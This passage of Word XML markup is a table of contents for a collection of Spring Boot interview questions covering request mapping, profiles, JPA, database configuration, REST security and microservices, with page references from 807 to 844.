                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308095 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>807</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17B262FB" w14:textId="06DEF0F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9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Can we use @RequestMapping at class level and method level both?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308096 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>808</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="318BECE9" w14:textId="5B7F8F9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9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will happen if I use @RequestMapping at method level?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308097 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>809</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="600C632F" w14:textId="65E88A2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9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map Service class to RestController?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308098 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>810</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5645F949" w14:textId="03663C0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09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are Profiles in Spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308099 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>812</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55793EFC" w14:textId="5E3825D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0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will you do CRUD operations using spring boot applications?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308100 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>814</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27721EBE" w14:textId="6637474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0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change from JAR to WAR in Spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308101 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>817</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="601226A7" w14:textId="0E124E6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0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ere will you give database details in the spring boot application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308102 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>818</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3361C762" w14:textId="0B11721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0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will you give database details for the individual environment?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308103 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>819</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="492AD7F6" w14:textId="72F7CBF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0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a JPA repository?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308104 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>819</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BABDEA6" w14:textId="2B53C70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0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use of @SpringBootApplication annotation in Spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308105 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>820</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B893775" w14:textId="662F7F4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0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will the Spring boot application know whether its JAR or WAR type?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308106 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>821</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A216356" w14:textId="16FFA4D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0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are you providing security to your services?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308107 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>821</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DECC04C" w14:textId="6B5C412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0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As an end user how can I consume your services?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308108 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>822</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E99E638" w14:textId="139D658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0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validate a token?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308109 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>823</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2121DE8B" w14:textId="7AE2248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1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native queries in Spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308110 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>824</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B633910" w14:textId="3C83D18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1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ere do you use native queries?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308111 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>825</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1890E7FE" w14:textId="1380DED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1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Suppose I am having different microservices, if I want to invoke different microservice so how can we interact?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308112 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>827</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A20B233" w14:textId="57A26DC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1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kind of information are you passing to the GET method?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308113 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>830</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2361077A" w14:textId="038FC91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1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Suppose I want to start a spring boot application, so what are all the steps?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308114 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>831</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C688898" w14:textId="1D05EFD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1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configure a custom server in a Spring boot application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308115 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>834</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="314D0EAE" w14:textId="1B0E956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1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configure multiple databases in a Spring boot application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308116 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>836</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7438EC6B" w14:textId="3E4C192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1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does your application know I am using a particular database?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308117 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>839</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46D2C273" w14:textId="5EB31B2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1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are REST calls intercepted in our project? How is the call happening?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308118 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>841</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E7AA01A" w14:textId="1C5E716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1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en I hit a URL how data will be invoked with your application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308119 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>844</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="615CD59E" w14:textId="58D760E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2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is the DTO getting invoked with REST endpoints?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308120 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
